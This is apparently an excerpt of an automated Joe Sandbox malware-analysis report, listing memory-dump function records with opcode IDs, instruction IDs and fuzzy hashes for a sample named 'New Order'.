                                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction Fuzzy Hash: D9E0D833244149ABD3212A5D8800B667BA9EBD17A0F190429E200CB151DB70DE42C7D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction ID: 2dc5bd0eae532c38193cdbcf27db6152b699a66eeff5844014fb1d2c58cf39e5
                                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction Fuzzy Hash: E4E0DF32A00120BBEB2197998D05F9ABEACDB90FA0F190054B700E70E4E570DF00C6D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                              • Instruction ID: 322f75aa844df1c67ac5288a16453ed29a5e2bfb821bcc14905e9f610a2e349a
                                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                              • Instruction Fuzzy Hash: DFE09B316403548BCB259A1EC541A77BFE8DF95764F15806DE90587712C631F942C6D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 93871fe1fb314e441b830c64be9405218d5a3b9ff3c78cd9b6dd628238697d82
                                                                                                                              • Instruction ID: 0dd7aeaf7d58245c8294d31b0f391d3d48bb2d7bfab3089cb93c317783ee46e1
                                                                                                                              • Opcode Fuzzy Hash: 93871fe1fb314e441b830c64be9405218d5a3b9ff3c78cd9b6dd628238697d82
                                                                                                                              • Instruction Fuzzy Hash: 14E092321009589BC322BB2DDD01F8A779AEF60360F114529B115971A0CB34AA10C785
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction ID: fc31e7f02a8a40890cb3451a928e2727756a2e9aafbf7e913739ba5e04384054
                                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction Fuzzy Hash: 10E0D831010A11DFE7366F2ED888B927BE5FF50711F148C2DE096925F0C7B89AC0CA41
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction ID: 08027123bd8e9850953a7c51b07afd565ca91c15a692746e3722e24ed883411c
                                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction Fuzzy Hash: D2E0AE353003068BE755DF1AC040B627BA6BFD5B10F28C068A9488F205EB32A9438A40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 91ed5d43f2de6b3e88916f91c521d0ffc47dc15d4e4d63133f8eb9dad1fe57fa
                                                                                                                              • Instruction ID: 93986b9afafb27f4815a445cb3a7a9ccd89e3ee6fe858027eed359aead22f855
                                                                                                                              • Opcode Fuzzy Hash: 91ed5d43f2de6b3e88916f91c521d0ffc47dc15d4e4d63133f8eb9dad1fe57fa
                                                                                                                              • Instruction Fuzzy Hash: 82D02B738810306ACB36E11C7C04F933B9EDBC1720F094862F108F2011D624CEC296C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                              • Instruction ID: 782da1c92fa8cd9e8de83fe73ede3b0c21f34da1870808912682f2b0afa57547
                                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                              • Instruction Fuzzy Hash: A5E08C3600CA14EFDB322F19EC00B52B6A6FF64B60F24486DF182461A58B70A981CA46
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5c371fe19c0f02968274f4be35a4decbd16c46c3e7b0b1556964ddd3461d3fc1
                                                                                                                              • Instruction ID: c073c30274418a143fbea96cb04c4dbf4b5a3c0c45660f6266e3ff9b9da036da
                                                                                                                              • Opcode Fuzzy Hash: 5c371fe19c0f02968274f4be35a4decbd16c46c3e7b0b1556964ddd3461d3fc1
                                                                                                                              • Instruction Fuzzy Hash: F0E08C321004546BC222FA5DDD00E4A739EEFA4360F100225B150872E4CA64AE00C795
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                              • Instruction ID: 2c99d07fe9e67412c0143d3c1b0ff0bee3b0bc0356cce3074dca48c7ddb6fdbe
                                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                              • Instruction Fuzzy Hash: C6E08633111A188BC729DE18D511B7277A4EF85720F09473EA61387780C534E544C7D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                              • Instruction ID: 5704e0b19bb6a22453a93e0ca92d7ef414617ec3b3485a23172eb2b3b9950ab4
                                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                              • Instruction Fuzzy Hash: 05D05E36511A50AFD3329F1BEA00C13BBF9FBC4B20705062EA94583924D670A906CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                              • Instruction ID: bdca75c346d67dab8759f530e338850822609c71b83b5507f8c565c305f2da61
                                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                              • Instruction Fuzzy Hash: 17D0A933614620ABD732AA1CFC00FC333E8BB88730F060459F018C7060C360EC81CA84
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                              • Instruction ID: 558510f8839cc8585801fb63234d2697ab9e0e32860be8b847b2456379e9c87d
                                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                              • Instruction Fuzzy Hash: 05E0EC369506849BDF52DF5DCA40F5ABBB9BB94B40F150458A5089B660C624EA00CB40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                              • Instruction ID: 0d848b8558f325a130f0f6f67e7361b5d887bae2d4c8786d9432ec2c37661216
                                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                              • Instruction Fuzzy Hash: DAD0123321607197DB2956596954F67BA19EF81AA4F1A006D7A0ED3A04C5158C42D6E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                              • Instruction ID: e68d03834cab99d76d2cec4bcf182754c342298f2b8eba97f138946365cc3c31
                                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                              • Instruction Fuzzy Hash: 04D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B904C75A0D63AE950D584
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                              • Instruction ID: 16329d031b68b93dc2a27f99636a4f04e1124e951bc974d9d0770472d2c28bc3
                                                                                                                              • Opcode Fuzzy Hash: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                              • Instruction Fuzzy Hash: 53D05230A010028BDF2BEB08CA54E2A3AB4FB50740B44006CEB00E2020E328DA028A80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction ID: 863ef163e531ddc87b6d8c0843eb524d570e0816851fc5b7c10b6203c4764527
                                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction Fuzzy Hash: 2CC01233290648AFC712AA99CD01F027BA9EBA8B50F000021F6048B670D631E920EA84
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction ID: ee1e5bf76feb05525783333f431e2b6d8002ac4286a9cef1114af0290c110af6
                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction Fuzzy Hash: EFD01236100248EFCB02DF45C890D9A772AFBD8710F108019FD19076108A31ED62DA90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction ID: cbd8389e54cd17c3163537c45779d0b0a1fecf3235d4763f0c353d17e22f3cd0
                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction Fuzzy Hash: B5C04C757115418FCF15DB1DD694F4577E4F744750F150890EC45DB721E624EE01CA11
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                              • Instruction ID: e86634a0331b6ad52d701efc0d57a07a6289415047713d6898c0649a006b31e1
                                                                                                                              • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                              • Instruction Fuzzy Hash: 20B01232212545CFC7036724CB00B2873AAFF027C0F0900F0A500C9830D6198A50E502
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 246c41ed2df89e7a6f15387f6c252fb73f2126af861df583670b33a950bc1b0e
                                                                                                                              • Instruction ID: 23857437874b18a8845298264832937a45c5393e3aae5b5049e10103c7140954
                                                                                                                              • Opcode Fuzzy Hash: 246c41ed2df89e7a6f15387f6c252fb73f2126af861df583670b33a950bc1b0e
                                                                                                                              • Instruction Fuzzy Hash: A1900231605800169281715948845464405E7E1301B55C012F5428554CCA148B5A5762
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0bf596c4c18848064149a6f2b720205f005c3a05a0c14f49bf49d36222411a41
                                                                                                                              • Instruction ID: 1404b28afba4cd06a7c393d276f8215ea5b64dec7a202d7e661414a199ea56b2
                                                                                                                              • Opcode Fuzzy Hash: 0bf596c4c18848064149a6f2b720205f005c3a05a0c14f49bf49d36222411a41
                                                                                                                              • Instruction Fuzzy Hash: 38900261601500464281715948044066405E7E2301395C116B5558560CC6188A59976A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8295d407eb067837cbf252e8b443aa53b251f503f5fd021ea8f27f2380b9d80d
                                                                                                                              • Instruction ID: 28bed9b49cbb92b9c36dd0dca508420f6293f8a91d3671ed49e76b327a70ae72
                                                                                                                              • Opcode Fuzzy Hash: 8295d407eb067837cbf252e8b443aa53b251f503f5fd021ea8f27f2380b9d80d
                                                                                                                              • Instruction Fuzzy Hash: EE90023120140806D245715948046860405D7D1301F55C012BB028655ED6658A957632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5f9c1f1ec590a3c16da6fc2d8916e79acf2178a69ac9a61c3866c2580a7f0c8f
                                                                                                                              • Instruction ID: 80d28288da1155b57856089337ad45fba3ecd85a368b2f21d2124fc41b0e22b2
                                                                                                                              • Opcode Fuzzy Hash: 5f9c1f1ec590a3c16da6fc2d8916e79acf2178a69ac9a61c3866c2580a7f0c8f
                                                                                                                              • Instruction Fuzzy Hash: 3F90023160540806D291715944147460405D7D1301F55C012B5028654DC7558B597BA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 266c1f16f0619dac38c4bda706432192238fe4b62064d4a847d8c5d418013b10
                                                                                                                              • Instruction ID: 34e2bc5a2eacb2282acb1b8150ccbad0eafd2c2c20690a043f7f12956c12a723
                                                                                                                              • Opcode Fuzzy Hash: 266c1f16f0619dac38c4bda706432192238fe4b62064d4a847d8c5d418013b10
                                                                                                                              • Instruction Fuzzy Hash: BF90023120544846D28171594404A460415D7D1305F55C012B5068694DD6258F59BB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4c5c0784ca9f38f9fda3f9bc49957d011470c937f29b102a40e0cd09fabeca13
                                                                                                                              • Instruction ID: 1a1d405a3f665da32b08d53b294aa2da6dc3d7d6e1baf168a04d6ccfa7300a95
                                                                                                                              • Opcode Fuzzy Hash: 4c5c0784ca9f38f9fda3f9bc49957d011470c937f29b102a40e0cd09fabeca13
                                                                                                                              • Instruction Fuzzy Hash: DB90023120140806D2C17159440464A0405D7D2301F95C016B5029654DCA158B5D7BA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd40e25678f7648d20e5085347f344da15e45569682ce50a160a128198632fe8
                                                                                                                              • Instruction ID: 910f314c9d9f4f02c8a6f8e55fe4a9a7a2c885ce4639be9fd4e456f3569f0ba6
                                                                                                                              • Opcode Fuzzy Hash: fd40e25678f7648d20e5085347f344da15e45569682ce50a160a128198632fe8
                                                                                                                              • Instruction Fuzzy Hash: 819002A1201540964641B2598404B0A4905D7E1301B55C017F6058560CC5258A559636
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d8d263281a3a63e68ce9a6c6aa2bdc4d06bf52a278ac309aa5182970b9db4d7d
                                                                                                                              • Instruction ID: 44f691dac0275605e9ac0f76beaef7923cf08b6f1041b091550e3ff3a02c626e
                                                                                                                              • Opcode Fuzzy Hash: d8d263281a3a63e68ce9a6c6aa2bdc4d06bf52a278ac309aa5182970b9db4d7d
                                                                                                                              • Instruction Fuzzy Hash: A3900225211400070246B55907045070446D7D6351355C022F6019550CD6218A655622
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f5ca0f518d9a0cd79a3a5d453a57284c3afb27bfaee9fa26a928e28f0a1c65b2
                                                                                                                              • Instruction ID: 713132643a80696a4a626132aae3a7a5cb0fa2d616f769ee194a9ec8b1388ce6
                                                                                                                              • Opcode Fuzzy Hash: f5ca0f518d9a0cd79a3a5d453a57284c3afb27bfaee9fa26a928e28f0a1c65b2
                                                                                                                              • Instruction Fuzzy Hash: 0E900225221400060286B559060450B0845E7D7351395C016F641A590CC6218A695722
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 84203809cbcd9e61c38ccfb371c85deafc8af50302d8cd9c755c7f8dffebc7dc
                                                                                                                              • Instruction ID: f1a811399f2bbb52d629397ed0c8e6a263597a77065f3941fdee7f82307d1602
                                                                                                                              • Opcode Fuzzy Hash: 84203809cbcd9e61c38ccfb371c85deafc8af50302d8cd9c755c7f8dffebc7dc
                                                                                                                              • Instruction Fuzzy Hash: 8990023124140406D282715944046060409E7D1341F95C013B5428554EC6558B5AAF62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: edf86e2ad902bfdbae114c0a4ae53dae904bcffd840ff7f527edf270d9c22e4a
                                                                                                                              • Instruction ID: 10b37bb9905b20b36fe7a614d10d8573f0822fd6beb1f4ab9689970a5ff954ff
                                                                                                                              • Opcode Fuzzy Hash: edf86e2ad902bfdbae114c0a4ae53dae904bcffd840ff7f527edf270d9c22e4a
                                                                                                                              • Instruction Fuzzy Hash: 0D900221242441565686B15944045074406E7E1341795C013B6418950CC5269A5ADB22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd47275046b1dd1317dccb7f3dd1d8bfdec1166d08378ee92fd2c25a8c1d1c33
                                                                                                                              • Instruction ID: 2cd2fd1fcdbbc992b8020f3474dc8e8466069edbc225ead815208bba94625d4d
                                                                                                                              • Opcode Fuzzy Hash: fd47275046b1dd1317dccb7f3dd1d8bfdec1166d08378ee92fd2c25a8c1d1c33
                                                                                                                              • Instruction Fuzzy Hash: 8D90022120544446D24175595408A060405D7D1305F55D012B6068595DC6358A55A632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebaf4b6bdc525efbf6d35338a4446a2008f64bfe07f3dac68ad45383bc5cfb88
                                                                                                                              • Instruction ID: 613da2772a49dddfca82c32a1a534e60a4bb2778d1eb461d823dd9eaa40a15fe
                                                                                                                              • Opcode Fuzzy Hash: ebaf4b6bdc525efbf6d35338a4446a2008f64bfe07f3dac68ad45383bc5cfb88
                                                                                                                              • Instruction Fuzzy Hash: 5D90022921340006D2C17159540860A0405D7D2302F95D416B5019558CC9158A6D5722
